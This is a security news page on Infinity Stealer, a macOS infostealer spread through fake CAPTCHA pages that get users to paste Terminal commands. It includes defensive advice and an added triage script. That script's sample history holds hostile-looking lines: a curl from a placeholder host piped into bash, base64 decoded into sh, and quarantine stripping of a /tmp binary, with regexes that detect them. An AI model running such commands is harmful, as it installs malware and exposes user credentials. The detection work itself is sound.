Malware & Ransomware · HIGH

Infinity Stealer - New macOS Malware Campaign Uncovered

Source: Security Affairs
Tags: Infinity Stealer, Nuitka, macOS, ClickFix, Malwarebytes

In short: a new macOS infostealer tricks Mac users into pasting and running a harmful command in Terminal.

Quick Summary

A new infostealer campaign, Infinity Stealer, is targeting macOS users with fake Cloudflare CAPTCHA pages that talk the visitor into pasting a command into Terminal. The resulting payload harvests browser credentials, Keychain entries and screenshots. Anyone who has run such a command should treat the Mac and every account used on it as compromised and act immediately.

What Happened

Researchers at Malwarebytes have identified a new macOS infostealer they call Infinity Stealer. The final payload is Python code compiled to a native binary with Nuitka, and it is delivered through ClickFix, a social-engineering technique in which a fake Cloudflare CAPTCHA page persuades the visitor to run a command in Terminal. According to the report, this is the first campaign of its kind aimed at macOS; it adapts a lure previously seen against Windows.

The fake CAPTCHA tells the user to open Terminal, paste the supplied command and run it. That single command starts the infection chain: it fetches a Stage-1 Bash dropper, which decodes an embedded payload, writes a Stage-2 binary to disk, removes the macOS protections that would otherwise stop it from running, and executes it. No software vulnerability is exploited; the chain runs entirely on the user's own actions, which is what lets it reach macOS systems that were never a target for this kind of lure before.

Who's Being Targeted

The campaign targets macOS users broadly rather than a specific sector, exploiting the trust people place in familiar Cloudflare verification pages. Anyone who lands on such a page and follows its instructions without questioning them is at risk. The campaign also marks a shift in the threat landscape: macOS can no longer be treated as a low-risk environment for this class of malware.

The stealer collects browser credentials, Keychain entries and screenshots. It also checks whether it is running in an analysis environment, which slows sandbox-based detection and manual analysis.

Signs of Infection

The clearest warning sign comes before the infection: a web page that asks you to open Terminal and paste a command. If you have already done so, look for the pasted command in your shell history (~/.zsh_history or ~/.bash_history), and watch for unexplained account activity, unexpected notifications or password prompts. If you suspect you ran such a command, act quickly.

Malwarebytes has published Indicators of Compromise (IOCs) for the campaign, which users and organizations can use to check endpoints and hunt for infections. Downstream signs of the malware's presence include unauthorized logins to accounts and unusual activity in applications such as cryptocurrency wallets.

How to Protect Yourself

To limit the damage from Infinity Stealer, act immediately if you have run any Terminal command copied from a web page. Recommended steps:

  • Stop all sensitive activities on the affected Mac immediately, and assume everything it could read has been read.
  • Change your passwords from a different, clean device, starting with email, password manager and financial accounts.
  • Revoke active sessions, API keys and tokens associated with the compromised accounts.
  • Check /tmp (and /private/tmp) and ~/Library/LaunchAgents for files you did not create, and review your shell history for the pasted command.
  • Run a full scan with reputable antimalware software.
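As an added example (not code from the Malwarebytes report or the Security Affairs article), the script below automates the history and LaunchAgents checks from the list above. It scans a shell history file for the command shapes a paste-into-Terminal lure relies on (a curl or wget fetch piped straight into a shell, a base64 blob decoded into a shell, a quarantine attribute stripped, a file under /tmp made executable) and lists what each plist in a LaunchAgents directory would start at login. The regexes are generic to the ClickFix technique, not the campaign's published IOCs, and the history and plist it scans are constructed sample data embedded in the script (the lure uses a placeholder host). On a real Mac, point it at ~/.zsh_history or ~/.bash_history and ~/Library/LaunchAgents instead.

```shell
#!/usr/bin/env bash
# Added example: post-lure triage for a ClickFix-style infection on macOS.
# Not code from the Malwarebytes report or the Security Affairs article; the
# regexes describe the generic technique, not the campaign's published IOCs.

# Command shapes a paste-into-Terminal lure typically relies on (ERE):
#   1. curl/wget output piped straight into a shell
#   2. an embedded base64 blob decoded and piped into a shell
#   3. the quarantine attribute stripped so Gatekeeper never sees the file
#   4. a file under /tmp marked executable
# This is a heuristic: expect to review hits by hand.
CLICKFIX_RE='(curl|wget)[^|]*\|[[:space:]]*(ba|z)?sh|base64[[:space:]]+(-d|-D|--decode)[^|]*\|[[:space:]]*(ba|z)?sh|xattr[[:space:]]+(-c|-d[[:space:]]+com\.apple\.quarantine)|chmod[[:space:]]+\+x[[:space:]]+/(private/)?tmp/'

# scan_history FILE
# Prints every matching entry prefixed with "SUSPICIOUS: ". Returns 0 when at
# least one entry matched, 1 when none did, 2 when FILE is unreadable.
scan_history() {
  local file="$1" hits=0 line
  [ -r "$file" ] || { echo "scan_history: cannot read $file" >&2; return 2; }
  while IFS= read -r line || [ -n "$line" ]; do
    # zsh with EXTENDED_HISTORY stores ": <epoch>:<elapsed>;<command>"
    case "$line" in ": "*";"*) line="${line#*;}" ;; esac
    if printf '%s\n' "$line" | grep -Eq "$CLICKFIX_RE"; then
      printf 'SUSPICIOUS: %s\n' "$line"
      hits=$((hits + 1))
    fi
  done < "$file"
  [ "$hits" -gt 0 ]
}

# list_launch_agents DIR
# For each .plist in DIR prints its name and every <string> value (label,
# program and arguments), appending " <-- REVIEW" when a value points into a
# temp or hidden directory or invokes a download/decode tool.
list_launch_agents() {
  local dir="$1" plist values flag
  [ -d "$dir" ] || { echo "list_launch_agents: no directory $dir" >&2; return 2; }
  for plist in "$dir"/*.plist; do
    [ -e "$plist" ] || continue
    values=$(grep -o '<string>[^<]*</string>' "$plist" | sed 's/<[^>]*>//g')
    flag=""
    if printf '%s\n' "$values" | grep -Eq '^/(private/)?tmp/|/\.[^/]+/|curl|wget|base64'; then
      flag=" <-- REVIEW"
    fi
    printf '%s%s\n' "$(basename "$plist")" "$flag"
    printf '%s\n' "$values" | sed 's/^/    /'
  done
}

# make_sample
# Writes constructed sample data (a zsh history and one LaunchAgent plist) to
# a temp directory and prints its path. The lure line uses a placeholder host;
# it is not a real indicator from the report.
make_sample() {
  local dir
  dir=$(mktemp -d) || return 1
  cat > "$dir/zsh_history" <<'EOF'
: 1711000000:0;git status
: 1711000060:0;brew update
: 1711000120:0;curl -fsSL https://captcha.example.invalid/verify | bash
: 1711000180:0;echo bG9yZW0K | base64 -d | sh
: 1711000240:0;xattr -c /tmp/.hidden/bin && chmod +x /tmp/.hidden/bin
: 1711000300:0;ls -la
EOF
  mkdir -p "$dir/LaunchAgents"
  cat > "$dir/LaunchAgents/com.example.updater.plist" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/bin/bash</string><string>-c</string><string>/tmp/.hidden/bin</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>
EOF
  printf '%s\n' "$dir"
}

# Run against the constructed sample. On a real Mac use ~/.zsh_history (or
# ~/.bash_history) and ~/Library/LaunchAgents instead.
SAMPLE=$(make_sample)
scan_history "$SAMPLE/zsh_history"
list_launch_agents "$SAMPLE/LaunchAgents"
rm -rf "$SAMPLE"
```

On the sample data the history scan flags three entries (the piped curl, the decoded base64 and the xattr/chmod line) and the LaunchAgent is marked for review because it launches a binary under /tmp. A hit is not proof of infection on its own; it tells you which command to read and which file to look at.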

Never paste a command from a web page into Terminal: no legitimate CAPTCHA or verification page asks for that, so the request itself identifies the page as malicious. Keeping up with emerging lures and practising basic security hygiene substantially reduces the risk of infection.

🔒 Pro insight: Porting a proven Windows lure to macOS shows that commodity malware is going cross-platform; Mac users and defenders need the same scepticism toward paste-this-command prompts that Windows users have had to learn.

Original article from Security Affairs · Pierluigi Paganini

Related Pings

HIGH · Malware & Ransomware

Russian CTRL Toolkit - Malicious LNK Files Hijack RDP Access

Cybersecurity researchers have discovered a new Russian malware toolkit. Targeting Windows users, it exploits malicious LNK files to hijack RDP sessions, posing serious risks. Stay vigilant and protect your systems.

Source: The Hacker News

HIGH · Malware & Ransomware

TeamPCP's Telnyx Attack - New Tactics with WAV Payloads

TeamPCP has launched a new attack using WAV-based payloads to steal credentials from users of the Telnyx SDK. This shift in tactics highlights the evolving nature of cyber threats. Users should downgrade to the last known safe version immediately to protect their systems.

Source: Trend Micro Research

HIGH · Malware & Ransomware

Malware - Highlights from the Week of March 23-29, 2026

This past week revealed new malware threats, including infostealers and scams. Users of popular platforms are at risk. Stay alert and protect your data with updated security measures.

Source: Malwarebytes Labs

HIGH · Malware & Ransomware

VoidLink Malware Framework - AI-Assisted Threat Emerges with Serious Implications

The emergence of the VoidLink malware framework highlights the potential for AI-assisted malware development, with serious implications for cybersecurity.

Source: Cyber Security News

HIGH · Malware & Ransomware

New Malware Targets Cobra DocGuard Users - Latest Insights

A new malware wave is targeting Cobra DocGuard users, raising concerns about data security. This impacts organizations handling sensitive information. Stay updated on protective measures to combat these threats.

Source: Security Affairs

HIGH · Malware & Ransomware

Identity-Based Ransomware - Cloud Assets Under Threat

A new form of ransomware is targeting cloud and SaaS assets through identity theft. This method exploits browser vulnerabilities, posing a significant risk to users. Awareness and strong security measures are essential to protect sensitive data from these attacks.

Source: SC Media